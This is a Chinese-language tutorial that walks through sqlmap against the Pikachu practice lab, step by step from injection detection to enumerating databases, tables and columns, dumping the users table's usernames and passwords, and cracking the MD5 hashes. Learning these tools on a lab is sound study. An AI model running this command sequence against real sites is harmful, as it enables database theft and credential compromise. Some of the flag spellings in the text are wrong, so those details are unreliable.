這邊來詳細(xì)寫一篇SQLmap工具的使用方法,這邊借用了pikachu里sql注入類的字符形注入
?首先sql注入肯定要先找注入點(diǎn)在哪里,我們在輸入欄里輸入admin試試
?看到有向后臺查詢的get請求,然后直接放到sqlmap里試一下
sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.phpname=admin&submit=%E6%9F%A5%E8%AF%A2"
注意:-u后面的URL鏈接一定要加雙引號,不加的話有時候get請求里會有(&)這個符號不加雙引號的URL鏈接有這個符號就會報錯
如果URL正確的話他會出現(xiàn)很多如下圖的選項,這些可以按需要選擇,如果看不懂的話可以全都輸入y,然后按回車就可以了
?如果出現(xiàn)下圖這些信息,那么恭喜你該網(wǎng)站存在sql注入漏洞,就可以進(jìn)行下一步操作,如果提示報錯的話,可以看情況修改URL,或者該網(wǎng)站不存在sql?注入漏洞
經(jīng)過上一步可以看出來,改網(wǎng)站存在sql注入漏洞,那么可以進(jìn)行下一步,查詢數(shù)據(jù)庫了?
sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.php?name=admin&submit=%E6%9F%A5%E8%AF%A2" -dbs
?-bds的意思就是查詢該網(wǎng)站后臺所有數(shù)據(jù)庫
然后就出來了改后臺所有的數(shù)據(jù)庫,我們對pikachu這個庫進(jìn)行下一步,查看該數(shù)據(jù)庫里所有的表?
sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.php?name=admin&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -tables
?-D的意思就是指定查詢改數(shù)據(jù)庫,-tables的意思就是查詢該數(shù)據(jù)庫內(nèi)所有的表
?查詢出改表內(nèi)有五個表,我們對敏感表users進(jìn)行下一步,查詢表內(nèi)字段
sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.php?name=admin&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users -columns
?-T的意思是指定指定某數(shù)據(jù)的表,-columns是列出該表所有的字段名
?我們進(jìn)行對敏感信息,username,password進(jìn)行下一步查詢
sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.php?name=admin&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users -C username,password -dump
?-C是指定字段,-dump是列出這段內(nèi)信息
?這里就看到賬號密碼了,sql數(shù)據(jù)庫默認(rèn)是對密碼MD5加密的,sqlmap有個功能可以把列出來的密碼自動解密,如下圖,這個選項選了yes的話就會對密碼解密
文章來源:http://www.zghlxwxcb.cn/news/detail-418035.html
?如果對sqlmap這個工具有其他需求的話,可以使用sqlmap -help,來查看他其他命令選項。文章來源地址http://www.zghlxwxcb.cn/news/detail-418035.html
到了這里,關(guān)于kali工具SQLmap基本使用方法流程以及命令解析的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!